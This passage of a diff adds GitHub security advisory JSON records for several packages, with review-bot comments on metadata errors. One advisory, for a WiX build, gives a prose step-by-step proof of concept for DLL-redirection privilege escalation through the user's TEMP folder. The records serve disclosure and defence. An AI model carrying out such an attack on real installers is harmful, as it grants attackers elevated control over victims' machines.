"ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.0-beta.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23827" + }, + { + "type": "WEB", + "url": "https://github.com/0xJacky/nginx-ui/commit/8581bdd3c6f49ab345b773517ba9173fa7fc6199" + }, + { + "type": "PACKAGE", + "url": "https://github.com/0xJacky/nginx-ui" + }, + { + "type": "WEB", + "url": "https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72" + }, + { + "type": "WEB", + "url": "https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:30:18Z", + "nvd_published_at": "2024-01-29T16:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-259p-rvjx-ffwg/GHSA-259p-rvjx-ffwg.json b/advisories/github-reviewed/2024/02/GHSA-259p-rvjx-ffwg/GHSA-259p-rvjx-ffwg.json new file mode 100644 index 0000000000000..54a32cbcb98e6 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-259p-rvjx-ffwg/GHSA-259p-rvjx-ffwg.json 
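Review bot: The `affected.package.name` in the new GHSA-xvq9-4vpv-227m file is `github.com/0xJacky/Nginx-UI`, while every URL in the same file's `references` uses the lowercase repository path `github.com/0xJacky/nginx-ui`. Go module paths are matched case-sensitively, so if the `module` line of the project's `go.mod` uses the lowercase form, scanners keying on the exact module path will not associate this advisory with the module; the name should be checked against the `go.mod` at the fix commit `8581bdd3c6f49ab345b773517ba9173fa7fc6199` that is already listed under `references`. The `details` string also has an unfinished sentence (`But it will require the app.`) and the typo `senario`; both are upstream advisory text, but worth correcting if this file is touched again.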
@@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-259p-rvjx-ffwg", + "modified": "2024-02-08T18:24:21Z", + "published": "2024-02-08T18:24:21Z", + "aliases": [ + + ], + "summary": "Panel::Software Customized WiX .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges", + "details": "# Summary\n\n.be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges.\n\n# Details\n\nIf the bundle is not run as admin, the user's TEMP folder is used and not the system TEMP folder. A utility is able to monitor the user's TEMP folder for changes and drop its own DLL into the .be/.Local folder immediately when the .be folder is created. When the burn engine elevates, the malicious DLL receives elevated privileges.\n\n# PoC\n\nAs a standard, non-admin user:\n\n1. Monitor the user's TEMP folder for changes using ReadDirectoryChangesW\n1. On FILE_ACTION_ADDED, check if the folder name is .be\n1. Create a folder in .be named after the bundle + .Local (e.g. MyInstaller.exe.Local)\n1. Put the malicious COMCTL32.DLL in the .Local folder following the naming used for the real DLL (e.g. MyInstaller.exe.Local/x86_microsoft.windows.common-controls_.../COMCTL32.dll)\n1. Do hacker things when the engine escalates and the malicious DLL is loaded\n\nProper naming for the path can be obtained by using GetModuleHandle(\"comctl32.dll\") and GetModuleFileName.\n\n# Impact\n\nDLL redirection utilizing .exe.Local Windows capability. 
This impacts any installer built with the WiX installer framework.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "PanelSW.Custom.WiX" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.15.0-a44" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nirbar/wix3/security/advisories/GHSA-259p-rvjx-ffwg" + }, + { + "type": "PACKAGE", + "url": "https://github.com/nirbar/wix3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:24:21Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-29c2-65rj-h343/GHSA-29c2-65rj-h343.json b/advisories/github-reviewed/2024/02/GHSA-29c2-65rj-h343/GHSA-29c2-65rj-h343.json new file mode 100644 index 0000000000000..6cf470c3d406b --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-29c2-65rj-h343/GHSA-29c2-65rj-h343.json 
@@ -0,0 +1,146 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29c2-65rj-h343", + "modified": "2024-02-03T00:29:06Z", + "published": "2024-02-03T00:29:06Z", + "aliases": [ + + ], + "summary": "Nervos CKB Permit load cell data from memory", + "details": "### Impact\n\nThe faulty nodes will reject transactions which calls `load_cell_data` syscall but the input cell is still in the mempool. They also ban other nodes and cause the network separation.\n\n### Patches\n\n0.35.2, 0.36.1, 0.37.1, 0.38.2", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.39.0-rc1" + }, + { + "fixed": "0.39.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.35.0-rc1" + }, + { + "fixed": "0.35.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.36.0-rc1" + }, + { + "fixed": "0.36.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.37.0-rc1" + }, + { + "fixed": "0.37.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.38.0-rc1" + }, + { + "fixed": "0.38.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-29c2-65rj-h343" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/277061867eb7d2766fa6737c8bf00684fc2462a6" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/37d60d581c6713d3aca1a57018eaea45447ae0b2" + }, + { + "type": "WEB", + "url": 
"https://github.com/nervosnetwork/ckb/commit/8f115b387f8f60f938bce4591f26cd78430b8771" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/91efb7b6b4329d70d60eee91d5239a2de9b0d99f" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/97647408ee9dbf525f6c678796e770887c9f8738" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:29:06Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-2cjh-75gp-34gc/GHSA-2cjh-75gp-34gc.json b/advisories/github-reviewed/2024/02/GHSA-2cjh-75gp-34gc/GHSA-2cjh-75gp-34gc.json new file mode 100644 index 0000000000000..451e2b2385cf6 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-2cjh-75gp-34gc/GHSA-2cjh-75gp-34gc.json 
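Review bot: The `affected` array in this hunk carries a range from `0.39.0-rc1` to `"fixed": "0.39.0"`, but the `### Patches` paragraph in `details` lists only 0.35.2, 0.36.1, 0.37.1 and 0.38.2, so a reader cannot tell whether 0.39.0 is a fix release or the range was added by mistake; either drop that range or extend the text to `0.35.2, 0.36.1, 0.37.1, 0.38.2, 0.39.0`. Both `severity` and `database_specific.cwe_ids` are empty arrays while `database_specific.severity` is `"MODERATE"`, which leaves the rating unexplained; if a CVSS vector was assessed it belongs in `severity`. The details describe a consensus fault (faulty nodes reject valid transactions and ban peers), which points at an input-validation or denial-of-service classification, but the CWE should be confirmed against the upstream advisory rather than guessed here.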
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2cjh-75gp-34gc",
+ "modified": "2024-02-06T20:00:20Z",
+ "published": "2024-02-01T09:30:18Z",
+ "aliases": [
+ "CVE-2024-22859"
+ ],
+ "summary": "livewire Cross-Site Request Forgery vulnerability",
+ "details": "Cross-Site Request Forgery (CSRF) vulnerability in livewire before v3.0.4, allows remote attackers to execute arbitrary code getCsrfToken function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "livewire/livewire"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.0.0"
+ },
+ {
+ "fixed": "3.0.4"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22859"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/livewire/livewire/commit/5d887316f2aaf83c0e380ac5e72766f19700fa3b"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/livewire/livewire"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-01T19:21:55Z",
+ "nvd_published_at": "2024-02-01T07:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-2mrq-w8pv-5pvq/GHSA-2mrq-w8pv-5pvq.json b/advisories/github-reviewed/2024/02/GHSA-2mrq-w8pv-5pvq/GHSA-2mrq-w8pv-5pvq.json
new file mode 100644
index 0000000000000..64bd80f789533
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-2mrq-w8pv-5pvq/GHSA-2mrq-w8pv-5pvq.json
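Review bot: The `details` sentence is missing a connective: `allows remote attackers to execute arbitrary code getCsrfToken function` should read `allows remote attackers to execute arbitrary code via the getCsrfToken function`. The summary and `cwe_ids` classify this as CSRF (CWE-352), yet the only mechanism-specific reference is a bare commit link; an issue or upstream advisory explaining how a CSRF in `getCsrfToken` leads to code execution would let consumers judge the `C:H/I:H/A:H` vector, which is unusually high for a CSRF requiring `UI:R`. I cannot tell from this hunk whether such a reference exists upstream.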
@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2mrq-w8pv-5pvq", + "modified": "2024-02-02T18:44:45Z", + "published": "2024-02-02T18:10:04Z", + "aliases": [ + "CVE-2024-23635" + ], + "summary": "Malicious input can provoke XSS when preserving comments", + "details": "# Impact\n\nThere is a potential for a mutation XSS (mXSS) vulnerability in AntiSamy caused by flawed parsing of the HTML being sanitized. To be subject to this vulnerability the `preserveComments` directive must be enabled in your policy file. As a result, certain crafty inputs can result in elements in comment tags being interpreted as executable when using AntiSamy's sanitized output.\n\n# Patches\n\nPatched in AntiSamy 1.7.5 and later. This is due to parsing behavior in the [neko-htmlunit](https://github.com/HtmlUnit/htmlunit-neko) dependency, just by updating to a newer version the issue was solved. See important remediation details in the reference given below.\n\n# Workarounds\n\nIf you cannot upgrade to a fixed version of the library, the following mitigation can be applied until you can upgrade: Manually edit your AntiSamy policy file (e.g., antisamy.xml) by deleting the `preserveComments` directive or setting its value to `false`, if present.\n\nAs the previously mentioned policy settings are preconditions for the mXSS attack to work, changing them as recommended should be sufficient to protect you against this vulnerability when using a vulnerable version of this library. However, the existing bug would still be present in the parser dependency (neko-htmlunit) and therefore in AntiSamy. The safety of this workaround relies on configurations that may change in the future and don't address the root cause of the vulnerability. 
As such, it is strongly recommended to upgrade to a fixed version of AntiSamy.\n\n# For more information\n\nIf you have any questions or comments about this advisory:\n\nEmail one of the project co-leaders, listed on the [OWASP AntiSamy project](https://owasp.org/www-project-antisamy/) page, under \"Leaders\".\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.owasp.antisamy:antisamy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.7.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.7.4" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nahsra/antisamy/security/advisories/GHSA-2mrq-w8pv-5pvq" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23635" + }, + { + "type": "WEB", + "url": "https://github.com/nahsra/antisamy/commit/12a2e31d3855430c119480655c2bbbbb79a66ecd" + }, + { + "type": "WEB", + "url": "https://github.com/nahsra/antisamy/commit/3e84410ed06ab67f0a4cc3183c67528210f4847d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/nahsra/antisamy" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:10:04Z", + "nvd_published_at": "2024-02-02T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-2mx7-xvfg-fg53/GHSA-2mx7-xvfg-fg53.json b/advisories/github-reviewed/2024/02/GHSA-2mx7-xvfg-fg53/GHSA-2mx7-xvfg-fg53.json new file mode 100644 index 0000000000000..abdc9267ebb7a --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-2mx7-xvfg-fg53/GHSA-2mx7-xvfg-fg53.json 
@@ -0,0 +1,80 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2mx7-xvfg-fg53",
+ "modified": "2024-02-08T18:25:35Z",
+ "published": "2024-02-08T03:32:45Z",
+ "aliases": [
+ "CVE-2023-47798"
+ ],
+ "summary": "Liferay Portal's account lockout does not invalidate existing user sessions",
+ "details": "Account lockout in Liferay Portal 7.2.0 through 7.3.0, and older unsupported versions, and Liferay DXP 7.2 before fix pack 5, and older unsupported versions does not invalidate existing user sessions, which allows remote authenticated users to remain authenticated after an account has been locked.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "com.liferay.portal:release.portal.bom"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "7.2.0"
+ },
+ {
+ "fixed": "7.3.1"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "com.liferay.portal:release.dxp.bom"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "7.2.0"
+ },
+ {
+ "fixed": "7.2.10.fp5"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47798"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/liferay/liferay-portal"
+ },
+ {
+ "type": "WEB",
+ "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-47798"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-384"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T18:25:35Z",
+ "nvd_published_at": "2024-02-08T03:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-34q3-p352-c7q8/GHSA-34q3-p352-c7q8.json b/advisories/github-reviewed/2024/02/GHSA-34q3-p352-c7q8/GHSA-34q3-p352-c7q8.json
new file mode 100644
index 0000000000000..bd54881e80a7f
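Review bot: `cwe_ids` carries `CWE-384` (Session Fixation), but the `details` describe sessions that remain valid after an account lockout, which is insufficient session expiration (CWE-613) rather than fixation; the Liferay page in `references` should decide which classification is kept. The rest of the record is internally consistent: the two ranges match the "7.2.0 through 7.3.0" and "DXP 7.2 before fix pack 5" wording, and the `C:L/I:L/A:N` vector agrees with the `"MODERATE"` label.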
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-34q3-p352-c7q8/GHSA-34q3-p352-c7q8.json
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34q3-p352-c7q8", + "modified": "2024-02-06T22:18:58Z", + "published": "2024-02-02T16:55:25Z", + "aliases": [ + "CVE-2024-1143" + ], + "summary": "Central Dogma Authentication Bypass Vulnerability via Session Leakage", + "details": "### Vulnerability Overview\nA vulnerability has been identified in Central Dogma versions prior to 0.64.0, allowing for the leakage of user sessions and subsequent authentication bypass. The issue stems from a Cross-Site Scripting (XSS) attack vector that targets the RelayState of Security Assertion Markup Language (SAML).\n\n### Impact\nSuccessful exploitation of this vulnerability enables malicious actors to leak user sessions, leading to the compromise of authentication mechanisms. This, in turn, can facilitate unauthorized access to sensitive resources.\n\n### Patches\nThis vulnerability is addressed and resolved in Central Dogma version 0.64.0. Users are strongly encouraged to upgrade to this version or later to mitigate the risk associated with the authentication bypass.\n\n### Workarounds\nNo viable workarounds are currently available for this vulnerability. 
It is recommended to apply the provided patch promptly.\n\n### References\n- [OASIS SAML v2.0 Errata 05](https://docs.oasis-open.org/security/saml/v2.0/errata05/os/saml-v2.0-errata05-os.html#__RefHeading__8196_1983180497)\n- [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-defense-philosophy)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.linecorp.centraldogma:centraldogma-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.64.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/line/centraldogma/security/advisories/GHSA-34q3-p352-c7q8" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1143" + }, + { + "type": "WEB", + "url": "https://github.com/line/centraldogma/commit/8edcf913b88101aff70008156b0881850e005783" + }, + { + "type": "PACKAGE", + "url": "https://github.com/line/centraldogma" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T16:55:25Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-3gjh-29fv-8hr6/GHSA-3gjh-29fv-8hr6.json b/advisories/github-reviewed/2024/02/GHSA-3gjh-29fv-8hr6/GHSA-3gjh-29fv-8hr6.json new file mode 100644 index 0000000000000..f1028b8a8c21e --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-3gjh-29fv-8hr6/GHSA-3gjh-29fv-8hr6.json 
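Review bot: The fix version in this hunk disagrees with the text: `details` says twice that the issue is resolved in Central Dogma 0.64.0, but the range event is `"fixed": "0.64.1"`, so matching tools will flag 0.64.0 as vulnerable while the narrative calls it safe; either change the event to `"fixed": "0.64.0"` or add a sentence explaining why 0.64.1 is required. `cwe_ids` is an empty array although the details describe an XSS vector in the SAML RelayState that leaks the session, so `CWE-79` (already used elsewhere in this commit) is the obvious classification, possibly alongside a session-management CWE. The `"CRITICAL"` label is consistent with the `S:C/C:H/I:H` vector given, so only the version and CWE need attention.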
@@ -0,0 +1,53 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3gjh-29fv-8hr6",
+ "modified": "2024-02-03T00:18:10Z",
+ "published": "2024-02-03T00:18:10Z",
+ "aliases": [
+
+ ],
+ "summary": "Nervos CKB Snappy decompress length can be very large and causes out of memory error ",
+ "details": "### Impact\n\nAdversary can create message which compressed size is less than the package limit but the decompressed length is very large such as 1G. It will cost the node many memories to process the network messages, and on the system with less than 1G memory, the process is killed directly because of out of memory error.\n\n### Patches\n\nThe node must check the decompress length before allocating the memory for the message.\n\n### References\n\n* https://github.com/nervosnetwork/ckb/blob/687d797f1888dd05d1f38ce6d1bef3e5b9b6e38b/network/src/compress.rs#L68\n* https://github.com/BurntSushi/rust-snappy/blob/master/src/decompress.rs#L106\n* https://github.com/BurntSushi/rust-snappy/blob/6cfb836463b9b3ac48ca7cd15d0a50d030e95769/src/decompress.rs#L30",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "ckb"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.34.2"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.34.1"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-3gjh-29fv-8hr6"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-03T00:18:10Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-3qx3-6hxr-j2ch/GHSA-3qx3-6hxr-j2ch.json b/advisories/github-reviewed/2024/02/GHSA-3qx3-6hxr-j2ch/GHSA-3qx3-6hxr-j2ch.json
new file mode 100644
index 0000000000000..26ac73abc12b6
--- /dev/null
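Review bot: `cwe_ids` is empty although the details describe the node allocating memory sized by an attacker-controlled decompressed length, which is CWE-770 (Allocation of Resources Without Limits or Throttling); `severity` is likewise an empty array while `database_specific.severity` is `"HIGH"`, so the rating has no vector behind it. The `summary` value ends with a trailing space (`...out of memory error "`), which will surface in downstream rendering and should be trimmed. The `### Patches` paragraph states what a fix must do but names no fixed release, while the range says `"fixed": "0.34.2"`; a sentence such as `Fixed in 0.34.2.` in the details would tie the two together.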
+++ b/advisories/github-reviewed/2024/02/GHSA-3qx3-6hxr-j2ch/GHSA-3qx3-6hxr-j2ch.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3qx3-6hxr-j2ch", + "modified": "2024-02-08T18:47:28Z", + "published": "2024-02-08T18:47:28Z", + "aliases": [ + + ], + "summary": "eza Potential Heap Overflow Vulnerability for AArch64", + "details": "### Summary\nIn `eza`, there exists a potential heap overflow vulnerability, first seen when using Ubuntu for Raspberry Pi series system, on `ubuntu-raspi` kernel, relating to the `.git` directory.\n\n### Details\nThe vulnerability seems to be triggered by the `.git` directory in some projects. This issue may be related to specific files, and the directory structure also plays a role in triggering the vulnerability. Files/folders that may be involved in triggering the vulnerability include `.git/HEAD`, `.git/refs`, and `.git/objects`.\n\nAs @polly pointed out to me, this is likely caused by [GHSA-j2v7-4f6v-gpg8](https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8), which we do seem to use currently.\n\n### PoC\nFor more information check @CuB3y0nd's blogpost [blog](https://www.cubeyond.net/blog/eza-cve-report).\n\n### Impact\nArbitrary code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "eza" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.18.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/eza-community/eza/security/advisories/GHSA-3qx3-6hxr-j2ch" + }, + { + "type": "WEB", + "url": "https://github.com/eza-community/eza/commit/47c9b90368c49117ba42760bd58acafa3362cbd4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/eza-community/eza" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:47:28Z", + "nvd_published_at": null + } +} \ No 
newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-3rfr-mpfj-2jwq/GHSA-3rfr-mpfj-2jwq.json b/advisories/github-reviewed/2024/02/GHSA-3rfr-mpfj-2jwq/GHSA-3rfr-mpfj-2jwq.json
new file mode 100644
index 0000000000000..3730cb070b070
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-3rfr-mpfj-2jwq/GHSA-3rfr-mpfj-2jwq.json
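Review bot: The `details` of this hunk attribute the root cause to the libgit2 advisory GHSA-j2v7-4f6v-gpg8, but that advisory appears only inside the prose and not in `references`; add `{"type": "ADVISORY", "url": "https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8"}` so consumers can follow the dependency chain. `cwe_ids` is empty for what the summary calls a heap overflow; CWE-122 is the direct classification, with the caveat that the text itself says the flaw is likely in a dependency rather than in eza. Because the affected range is expressed only on the `eza` crate, it is worth stating in the details whether 0.18.2 fixes the issue by updating the dependency, since the commit reference alone does not say.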
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3rfr-mpfj-2jwq",
+ "modified": "2024-02-07T20:24:53Z",
+ "published": "2024-02-07T18:25:36Z",
+ "aliases": [
+ "CVE-2024-24822"
+ ],
+ "summary": "Pimcore Admin Classic Bundle permissions are not getting checked when working with tags",
+ "details": "### Impact\nYou can create, delete etc. tags without having the permission to do so.\nThis vulnerability allows an attacker to perform broken access control and add tags to admin panel and add dumy data. One can do this as intruder and add text parameters with random numbers and this will effect integrity and availability.\n\n### Patches\nAvailable in version 1.3.3.\n\n### Workarounds\nApply this pull request manually: https://github.com/pimcore/admin-ui-classic-bundle/pull/412\n\n### References\n-\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "pimcore/admin-ui-classic-bundle"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.3.3"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-3rfr-mpfj-2jwq"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24822"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pimcore/admin-ui-classic-bundle/pull/412"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pimcore/admin-ui-classic-bundle/commit/24660b6d5ad9cbcb037a48d4309a6024e9adf251"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/pimcore/admin-ui-classic-bundle"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-07T18:25:36Z",
+ "nvd_published_at": "2024-02-07T18:15:54Z"
+ }
+}
\ No newline at end of file
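Review bot: The `### References` section inside `details` is an empty bullet (`### References\n-\n`), which renders as a dangling dash; either drop the heading or point it at the pull request that is already listed in `references`. The same paragraph has `dumy data` for `dummy data` and `this will effect integrity` for `this will affect integrity`. These are wording-only fixes; the affected range, CWE-862 and the `I:H`-only vector are consistent with the text.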
diff --git a/advisories/github-reviewed/2024/02/GHSA-3ww4-gg4f-jr7f/GHSA-3ww4-gg4f-jr7f.json b/advisories/github-reviewed/2024/02/GHSA-3ww4-gg4f-jr7f/GHSA-3ww4-gg4f-jr7f.json
new file mode 100644
index 0000000000000..f97e927121df9
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-3ww4-gg4f-jr7f/GHSA-3ww4-gg4f-jr7f.json
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3ww4-gg4f-jr7f",
+ "modified": "2024-02-05T23:04:50Z",
+ "published": "2024-02-05T21:30:31Z",
+ "aliases": [
+ "CVE-2023-50782"
+ ],
+ "summary": "Python Cryptography package vulnerable to Bleichenbacher timing oracle attack",
+ "details": "A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "cryptography"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "42.0.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
